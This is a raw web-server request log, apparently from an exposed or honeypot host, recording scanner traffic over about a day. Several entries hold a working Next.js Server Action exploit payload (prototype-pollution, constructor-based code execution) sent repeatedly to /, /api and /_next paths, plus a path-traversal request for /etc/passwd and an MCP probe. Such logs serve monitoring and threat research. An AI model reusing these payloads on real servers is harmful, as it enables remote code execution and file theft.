Priority: u=0, i
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Mode: navigate
Accept-Language: en-GB,en;q=0.9
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-For: 45.85.105.23
Via: 2.0 Caddy
Sec-Fetch-Site: none
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34372
Path: /
URL: /
Method: GET
[2026-03-11 08:25:41] === HTTP Request ===
[2026-03-11 08:13:33] Main page accessed - IP: 34.76.97.83:37136
===================
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.76.97.83:37136
Path: /
URL: /
Method: GET
[2026-03-11 08:13:33] === HTTP Request ===
[2026-03-11 06:59:59] Main page accessed - IP: 165.245.187.143:55846
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.245.187.143:55846
Path: /
URL: /
Method: GET
[2026-03-11 06:59:59] === HTTP Request ===
[2026-03-11 05:01:27] Main page accessed - IP: 209.38.131.131:49678
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 209.38.131.131:49678
Path: /
URL: /
Method: GET
[2026-03-11 05:01:27] === HTTP Request ===
[2026-03-11 04:29:06] Main page accessed - IP: 176.65.149.45:49842
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:49842
Path: /
URL: /
Method: GET
[2026-03-11 04:29:06] === HTTP Request ===
===================
------WebKitFormBoundaryx1507036005901--
------WebKitFormBoundaryx1507036005901
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1507036005901
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 252170+true+5976270;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1507036005901
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
X-Nextjs-Html-Request-Id: ilovepoop_1507036005901
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1507036005901
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:43760
Path: /api/route
URL: /api/route
Method: POST
[2026-03-11 03:58:35] === HTTP Request ===
===================
------WebKitFormBoundaryx1189940390599--
------WebKitFormBoundaryx1189940390599
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1189940390599
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 325587+true+3654754;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1189940390599
X-Nextjs-Html-Request-Id: ilovepoop_1189940390599
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1189940390599
Next-Action: x
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:43734
Path: /app
URL: /app
Method: POST
[2026-03-11 03:58:35] === HTTP Request ===
===================
------WebKitFormBoundaryx1954384629261--
------WebKitFormBoundaryx1954384629261
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1954384629261
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 341558+true+5721970;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1954384629261
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1954384629261
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1954384629261
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:43726
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-11 03:58:33] === HTTP Request ===
===================
------WebKitFormBoundaryx238713995703--
------WebKitFormBoundaryx238713995703
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx238713995703
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 43394+true+5501083;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx238713995703
X-Nextjs-Html-Request-Id: ilovepoop_238713995703
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx238713995703
X-Nextjs-Request-Id: poop1234
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:43724
Path: /api
URL: /api
Method: POST
[2026-03-11 03:58:33] === HTTP Request ===
===================
------WebKitFormBoundaryx538809190921--
------WebKitFormBoundaryx538809190921
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx538809190921
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 130680+true+4123119;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx538809190921
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx538809190921
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_538809190921
X-Nextjs-Request-Id: poop1234
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:43712
Path: /_next
URL: /_next
Method: POST
[2026-03-11 03:58:33] === HTTP Request ===
[2026-03-11 03:58:33] Main page accessed - IP: 195.3.221.86:43698
===================
------WebKitFormBoundaryx642020640199--
------WebKitFormBoundaryx642020640199
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx642020640199
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 276919+true+2318442;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx642020640199
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
X-Nextjs-Request-Id: poop1234
X-Nextjs-Html-Request-Id: ilovepoop_642020640199
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx642020640199
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:43698
Path: /
URL: /
Method: POST
[2026-03-11 03:58:33] === HTTP Request ===
[2026-03-11 03:58:32] Main page accessed - IP: 195.3.221.86:43694
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:43694
Path: /
URL: /
Method: GET
[2026-03-11 03:58:32] === HTTP Request ===
[2026-03-11 03:25:29] Main page accessed - IP: 152.42.204.253:53804
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.42.204.253:53804
Path: /
URL: /
Method: GET
[2026-03-11 03:25:29] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50046
Path: /.openclaw/workspace/memory.md
URL: /.openclaw/workspace/memory.md
Method: GET
[2026-03-11 03:19:17] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 206.168.34.56:8346
Path: /wiki
URL: /wiki
Method: GET
[2026-03-11 02:38:33] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 206.168.34.56:9118
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-11 02:38:30] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 206.168.34.56:9106
Path: *
URL: *
Method: PRI
[2026-03-11 02:38:29] === HTTP Request ===
[2026-03-11 02:38:29] Main page accessed - IP: 206.168.34.56:9096
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 206.168.34.56:9096
Path: /
URL: /
Method: GET
[2026-03-11 02:38:29] === HTTP Request ===
[2026-03-11 01:29:03] Main page accessed - IP: 157.245.109.134:49082
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 157.245.109.134:49082
Path: /
URL: /
Method: GET
[2026-03-11 01:29:03] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 194.164.107.4:37434
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-11 01:18:20] === HTTP Request ===
[2026-03-11 01:17:47] Main page accessed - IP: 194.164.107.4:36596
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 194.164.107.4:36596
Path: /
URL: /
Method: GET
[2026-03-11 01:17:47] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.96:36624
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-11 00:48:21] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.182:31510
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-10 23:51:52] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 109.105.210.53:56210
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-10 23:46:30] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
Sec-Fetch-Mode: cors
Content-Type: application/json
Accept-Language: *
Accept: application/json, text/event-stream
User-Agent: python-httpx/0.28.1
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 109.105.210.52:50432
Path: /sse
URL: /sse
Method: GET
[2026-03-10 23:46:30] === HTTP Request ===
===================
Body: {"jsonrpc":"2.0","id":5855493,"method":"initialize","params":{"protocolVersion":"2025-06-18","capabilities":{"sampling":{},"elicitation":{},"roots":{"listChanged":true}},"clientInfo":{"name":"gitmc-org-mcp-scanner","version":"1.0.0"}}}
Content-Length: 235
Accept-Encoding: gzip, deflate
Sec-Fetch-Mode: cors
Accept: application/json, text/event-stream
User-Agent: python-httpx/0.28.1
Connection: keep-alive
Content-Type: application/json
Accept-Language: *
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 109.105.210.52:50432
Path: /mcp
URL: /mcp
Method: POST
[2026-03-10 23:46:30] === HTTP Request ===
[2026-03-10 23:46:28] Main page accessed - IP: 109.105.210.55:45178
===================
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 109.105.210.55:45178
Path: /
URL: /
Method: GET
[2026-03-10 23:46:28] === HTTP Request ===
===================
------WebKitFormBoundaryx1415710748893--
------WebKitFormBoundaryx1415710748893
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1415710748893
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 280052+true+5055171;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1415710748893
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
X-Nextjs-Html-Request-Id: ilovepoop_1415710748893
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1415710748893
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:58572
Path: /api/route
URL: /api/route
Method: POST
[2026-03-10 22:41:33] === HTTP Request ===
===================
------WebKitFormBoundaryx545791673719--
------WebKitFormBoundaryx545791673719
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx545791673719
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 138938+true+3928311;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx545791673719
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_545791673719
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx545791673719
X-Nextjs-Request-Id: poop1234
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:58564
Path: /app
URL: /app
Method: POST
[2026-03-10 22:41:33] === HTTP Request ===
===================
------WebKitFormBoundaryx162539017049--
------WebKitFormBoundaryx162539017049
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx162539017049
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 46181+true+3519608;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx162539017049
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx162539017049
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 517
Next-Action: x
X-Nextjs-Html-Request-Id: ilovepoop_162539017049
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:58548
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-10 22:41:33] === HTTP Request ===
===================
------WebKitFormBoundaryx939639859921--
------WebKitFormBoundaryx939639859921
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx939639859921
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 180260+true+5212692;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx939639859921
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx939639859921
X-Nextjs-Html-Request-Id: ilovepoop_939639859921
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:58546
Path: /api
URL: /api
Method: POST
[2026-03-10 22:41:32] === HTTP Request ===
===================
------WebKitFormBoundaryx71981078458--
------WebKitFormBoundaryx71981078458
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx71981078458
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 86413+true+832989;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx71981078458
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_71981078458
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx71981078458
Connection: close
Content-Length: 512
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:58540
Path: /_next
URL: /_next
Method: POST
[2026-03-10 22:41:32] === HTTP Request ===
[2026-03-10 22:41:30] Main page accessed - IP: 195.3.221.86:58538
===================
------WebKitFormBoundaryx251765715108--
------WebKitFormBoundaryx251765715108
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx251765715108
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 33181+true+7587647;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx251765715108
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_251765715108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx251765715108
X-Nextjs-Request-Id: poop1234
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:58538
Path: /
URL: /
Method: POST
[2026-03-10 22:41:30] === HTTP Request ===
[2026-03-10 22:41:30] Main page accessed - IP: 195.3.221.86:58532
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:58532
Path: /
URL: /
Method: GET
[2026-03-10 22:41:30] === HTTP Request ===
[2026-03-10 22:11:06] Main page accessed - IP: 176.65.149.45:34348
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:34348
Path: /
URL: /
Method: GET
[2026-03-10 22:11:06] === HTTP Request ===
[2026-03-10 22:06:27] Main page accessed - IP: 198.235.24.115:63140
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.115:63140
Path: /
URL: /
Method: GET
[2026-03-10 22:06:27] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-For: 74.7.175.185
From: oai-searchbot(at)openai.com
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:53572
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-10 22:04:54] === HTTP Request ===
[2026-03-10 21:10:38] Main page accessed - IP: 207.90.244.27:48930
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.27:48930
Path: /
URL: /
Method: GET
[2026-03-10 21:10:38] === HTTP Request ===
[2026-03-10 21:08:07] Main page accessed - IP: 134.209.152.49:44136
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 134.209.152.49:44136
Path: /
URL: /
Method: GET
[2026-03-10 21:08:07] === HTTP Request ===
[2026-03-10 20:47:59] Main page accessed - IP: 198.235.24.87:57169
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.87:57169
Path: /
URL: /
Method: GET
[2026-03-10 20:47:59] === HTTP Request ===
[2026-03-10 20:38:20] Main page accessed - IP: 159.65.156.72:34414
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 159.65.156.72:34414
Path: /
URL: /
Method: GET
[2026-03-10 20:38:20] === HTTP Request ===
[2026-03-10 20:27:05] Main page accessed - IP: 64.227.139.104:55918
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.139.104:55918
Path: /
URL: /
Method: GET
[2026-03-10 20:27:05] === HTTP Request ===
[2026-03-10 20:18:46] Main page accessed - IP: 152.42.204.253:56340
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.42.204.253:56340
Path: /
URL: /
Method: GET
[2026-03-10 20:18:46] === HTTP Request ===
[2026-03-10 19:31:42] Main page accessed - IP: 68.183.93.253:41666
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 68.183.93.253:41666
Path: /
URL: /
Method: GET
[2026-03-10 19:31:42] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.55:60420
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-10 18:18:53] === HTTP Request ===
[2026-03-10 18:18:53] Main page accessed - IP: 85.217.140.55:60406
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.55:60406
Path: /
URL: /
Method: GET
[2026-03-10 18:18:53] === HTTP Request ===
===================
------WebKitFormBoundaryx424357989189--
------WebKitFormBoundaryx424357989189
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx424357989189
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 140588+true+3018451;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx424357989189
X-Nextjs-Html-Request-Id: ilovepoop_424357989189
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx424357989189
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Next-Action: x
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:34400
Path: /api/route
URL: /api/route
Method: POST
[2026-03-10 17:22:43] === HTTP Request ===
===================
------WebKitFormBoundaryx174726985423--
------WebKitFormBoundaryx174726985423
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx174726985423
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 92697+true+1884926;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx174726985423
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx174726985423
Next-Action: x
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_174726985423
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:34392
Path: /app
URL: /app
Method: POST
[2026-03-10 17:22:43] === HTTP Request ===
===================
------WebKitFormBoundaryx236969914000--
------WebKitFormBoundaryx236969914000
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx236969914000
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 39293+true+6030843;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx236969914000
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_236969914000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx236969914000
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:34388
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-10 17:22:42] === HTTP Request ===
===================
------WebKitFormBoundaryx926201594557--
------WebKitFormBoundaryx926201594557
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx926201594557
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 119468+true+7752717;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx926201594557
X-Nextjs-Html-Request-Id: ilovepoop_926201594557
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx926201594557
Next-Action: x
